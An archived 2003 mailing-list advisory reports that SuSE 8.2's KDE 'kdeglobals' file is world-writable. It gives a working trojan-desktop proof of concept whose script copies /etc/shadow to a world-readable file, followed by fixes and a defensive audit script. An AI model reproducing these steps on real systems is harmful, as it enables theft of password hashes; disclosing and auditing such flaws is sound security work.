Vulnerability Development mailing list archives
KDE 3.1 - Suse 8.2 - kdeglobals world writable
From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)
Hi, Mrs.!

I have found one problem in suse 8.2 with KDE 3.1 (default installation in Brazilian version). The configuration file "kdeglobals" in /etc/opt/kde3/share/config is world writable. An attacker can exploit this vulnerability in many ways. One basic example of an attack is:

I - Overwrite the kdeglobals file with the contents below:

#
# written by SuSEconfig.kde
#
[Locale]
Country=pt
Language=pt:BR
#Already altered below.
[Paths]
Desktop=/tmp/Desktop

II - Create the folder /tmp/Desktop and a trojan horse in some .desktop file inside it. Example:

glaudson@suse:/tmp/Desktop> cat xpdf.desktop
[Desktop Entry]
Exec=/tmp/AutoStart/teste.sh
Icon=gv
TerminalOptions=
Path=
Type=Application
Terminal=0
X-KDE-StartupNotify=false
glaudson@suse:/tmp/Desktop>

III - Create the file to execute, /tmp/AutoStart/teste.sh, with backdoor/trojan/spyware/malware code. Example:

glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
#!/bin/bash
cp /etc/shadow /tmp/shadow
chmod 0777 /tmp/shadow

The icon "xpdf" will appear on root's desktop. If root runs the icon, he runs the trojan horse and the attack will succeed.

There are many other ways to exploit this bug.

Solution:

chmod 0500 /etc/opt/kde3/share/config/kdeglobals

or

rm -rf /etc/opt/kde3/share/config/kdeglobals

There are also other world-writable files in suse 8.2 (Brazilian version):

glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \)
/etc/opt/kde3/share/config/kmailrc
/etc/opt/kde3/share/config/kioslaverc
/etc/opt/kde3/share/config/kdeglobals.SuSEconfig
/etc/opt/kde3/share/config/kdeglobals
find: /etc/opt/kde3/share/servicetypes: Permissão negada
glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
SuSE Linux 8.2 (i586)
VERSION = 8.2
glaudson@suse:/tmp/Desktop> cat /proc/version
Linux version 2.4.20-4GB-athlon (root () Athlon suse de) (gcc version 3.3 20030226 (prerelease) (SuSE Linux)) #1 Mon Mar 17 17:56:47 UTC 2003

Best Regards,
Martin Fallon.
Mercenarie's Club http://cdm.frontthescene.com.br/
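
An audit for the two conditions reported above, as an added example that is not part of the original post: it lists world-writable files in a configuration directory and flags [Paths] entries that point at or below a world-writable directory such as /tmp. The function names are hypothetical, and the directory to scan is passed as an argument.

```shell
#!/usr/bin/env bash
# Added example, not from the original post. Function names are hypothetical.

# Regular files under directory $1 that any user can write to.
world_writable_files() {
    find "$1" -type f -perm -0002 2>/dev/null | sort
}

# Succeeds if $1 or any ancestor directory is world-writable. A path below
# such a directory (for example /tmp) can be created or replaced by anyone.
under_world_writable() {
    local dir="$1" parent
    while :; do
        if [ -n "$(find -H "$dir" -maxdepth 0 -type d -perm -0002 2>/dev/null)" ]; then
            return 0
        fi
        parent=$(dirname "$dir")
        [ "$parent" = "$dir" ] && return 1
        dir=$parent
    done
}

# Print key=value entries from the [Paths] section of config file $1 whose
# value is an absolute path at or below a world-writable directory.
risky_paths() {
    awk '
        /^[ \t]*\[/ { in_paths = ($0 ~ /^[ \t]*\[Paths\]/); next }
        in_paths && /^[^#=]+=\// { print }
    ' "$1" | while IFS='=' read -r key value; do
        if under_world_writable "$value"; then
            printf '%s=%s\n' "$key" "$value"
        fi
    done
}

# Report both findings for every file in config directory $1.
audit_kde_config() {
    local f entry
    world_writable_files "$1" | while read -r f; do
        printf 'WORLD-WRITABLE %s\n' "$f"
    done
    find "$1" -type f 2>/dev/null | sort | while read -r f; do
        risky_paths "$f" | while read -r entry; do
            printf 'RISKY-PATH %s: %s\n' "$f" "$entry"
        done
    done
}
```

Run it as `audit_kde_config /etc/opt/kde3/share/config`; an empty result means neither condition was found in that directory.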